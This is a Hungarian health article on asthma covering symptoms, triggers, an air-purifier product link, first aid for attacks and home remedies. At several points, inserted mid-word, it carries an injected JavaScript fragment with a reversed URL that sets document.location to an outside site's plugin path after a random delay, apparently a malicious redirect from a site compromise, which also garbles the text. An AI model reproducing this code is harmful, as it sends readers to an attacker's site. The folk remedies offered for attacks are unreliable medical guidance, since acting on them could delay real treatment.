Mi is az asztma tulajdonképpen?

Az asztma egy a hörgők és a nyálkahártya különleges gyulladása, illetve a hörögők izmainak görcsös összehúzódása miatt fellépő tünet együttes mely mellé gyakran társulnak különféle allergiák.

Milyen tünetek léphetnek fel asztmás megbetegedés esetén?

AsztmaNehézlégzés
Sípoló hang kilégzéskor
Szorító érzés a mellkas tájékán
Fulladás
Hosszas kilégzés
Köhögésrohamok
Nyak és mellkas tájékának viszketése
Görcsös köhögés
Légszomj

Mik azok a dolgok és tevékenységek, amelyek kiváltják, illetve súlyosbítják az asztmás tüneteket?

Asztmás rohamDohányzás
Allergiás hajlam
Szennyezett levegő
Állatszőr
Szintetikus anyagok
Stressz
Penészgombák
Poratkák
Allergén élelmiszerek
A tüdőt túlzott mértékben megterhelő sportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok

A felsorolt okokból látható, hogy több ok is megszüntethető otthon, ha a levegőt fertőtlenítjük. ( Pl. dohányzás, szennyezett levegő, penészgombák, poratkák). Levegőfertőtlenítésre olyan módszert tanácsos választani, amely úgy fertőtleníti a levegőt, hogy a beteg is a helyiségben tartózkodhat. Egyik ilyen típusra példát a linkre kattintva láthat:

https://mediforte.hu/novaerus-otthoni-felhasznalas/https://mediforte.hu/novaerus-egeszsegugyi-felhasznalas/


Enyhébb betegség esetén már e tényezők kiiktatásával is megszabadulhatunk az asztmától.
Súlyosabb esetben az orvos valamilyen hörgőtágítót, és/vagy gyulladáscsökkentőt fog felírni.

Mit tegyünk, ha valaki asztmás rohamot kap a környezetünkben?

1. Az érintett személyt lehetőleg hozzuk olyan helyzetbe, hogy egyenes testtartásban tudjon lélegezni!
2. Biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosítsuk a friss levegő folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos áramlását!
3. Hozzunk létre nyugodt, biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonságos körülményeket! (Félelmünket ne mutassuk, mivel ha a beteg ez észreveszi, a roham súlyosbodhat!)
4. Az orvos által erre az esetre előírt gyógyszereket adjuk be a betegnek!
5. Ha tünetek 60 percen belül nem enyhülnek, vagy esetleg rosszabbodnak, keressük fel a kezelőorvost, vagy ha ez nem lehetséges, szállítsuk el a legközelebbi korházba, mivel intravénás hörgőtágítókra, illetve súlyosabb esetben gépi lélegeztetésre lehet szükség!
Enyhébb roham esetén, ha éppen nincs kéznél gyógyszer, ezek a módszerek is segíthetnek.
Figyelem! Ezek a gyógymódok nem helyettesítik az előírt orvosi kezelést!
I. Rágcsáljunk édesköményt, mivel ez tisztítja a légutakat!
II. Étkezés előtt fogyasszunk mézbe kevert kurkumát- mivel ezek gyulladáscsökkentő hatásúak!
III. Inhaláljunk forró köménymag-teával!
IV. Pucoljunk Meg néhány fej vöröshagymát és gránátalmát, majd mind a héjat mind a hagymát illetve gránátalmát tegyük lobogóan forró vízbe, forraljuk néhány percig, majd szűrjük le, és a főzetet mézzel fogyasszuk!
V. Reszeljünk le egy fej fokhagymát, egy darab gyömbért és egy kis retket, keverjünk hozzá citromlevet, kurkumát, mézet és egy kis borsot tegyük forró vízbe, forraljuk bár percig majd szűrjük le és a főzetet igyuk meg!
VI. A beteg hátát és mellkasát kenjük be mentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolos krémmel! Ez jelentősen megkönnyítheti a légzést.